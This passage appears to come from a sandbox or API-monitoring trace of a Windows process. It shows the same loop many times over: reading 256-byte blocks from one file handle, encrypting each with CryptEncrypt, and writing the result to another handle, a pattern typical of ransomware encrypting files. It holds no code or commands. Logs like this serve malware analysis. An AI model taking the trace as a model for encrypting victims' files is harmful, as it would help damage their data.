out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.599] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.600] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.600] GetLastError () returned 0x0 [0152.600] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.600] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.600] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.600] GetLastError () returned 0x0 [0152.600] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.600] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.600] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.600] GetLastError () returned 0x0 [0152.600] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.600] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.600] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.600] GetLastError () returned 0x0 [0152.600] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.600] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.600] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.600] GetLastError () returned 0x0 [0152.600] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.600] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.600] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.600] GetLastError () returned 0x0 [0152.600] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.600] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.600] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.601] GetLastError () returned 0x0 [0152.601] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.601] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.601] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.601] GetLastError () returned 0x0 [0152.601] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.601] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.601] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.601] GetLastError () returned 0x0 [0152.601] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.601] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.601] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.601] GetLastError () returned 0x0 [0152.601] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.601] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.601] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.601] GetLastError () returned 0x0 [0152.601] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.601] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.601] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.601] GetLastError () returned 0x0 [0152.601] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.601] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.601] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.601] GetLastError () returned 0x0 [0152.601] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.601] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.602] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.602] GetLastError () returned 0x0 [0152.602] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.602] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.602] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.602] GetLastError () returned 0x0 [0152.602] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.602] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.602] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.602] GetLastError () returned 0x0 [0152.602] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.602] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.602] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.602] GetLastError () returned 0x0 [0152.602] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.602] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.602] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.603] GetLastError () returned 0x0 [0152.603] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.603] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.603] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.603] GetLastError () returned 0x0 [0152.603] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.603] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.603] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.603] GetLastError () returned 0x0 [0152.603] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.603] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.603] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.603] GetLastError () returned 0x0 [0152.603] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.603] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.603] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.603] GetLastError () returned 0x0 [0152.603] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.603] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.603] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.603] GetLastError () returned 0x0 [0152.603] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.603] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.603] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.603] GetLastError () returned 0x0 [0152.603] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.604] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.604] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.604] GetLastError () returned 0x0 [0152.604] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.604] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.604] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.604] GetLastError () returned 0x0 [0152.604] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.604] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.604] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.604] GetLastError () returned 0x0 [0152.604] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.604] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.604] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.604] GetLastError () returned 0x0 [0152.604] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.604] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.604] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.604] GetLastError () returned 0x0 [0152.604] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.604] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.604] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.604] GetLastError () returned 0x0 [0152.604] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.604] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.605] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.605] GetLastError () returned 0x0 [0152.605] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.605] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.605] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.605] GetLastError () returned 0x0 [0152.605] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, 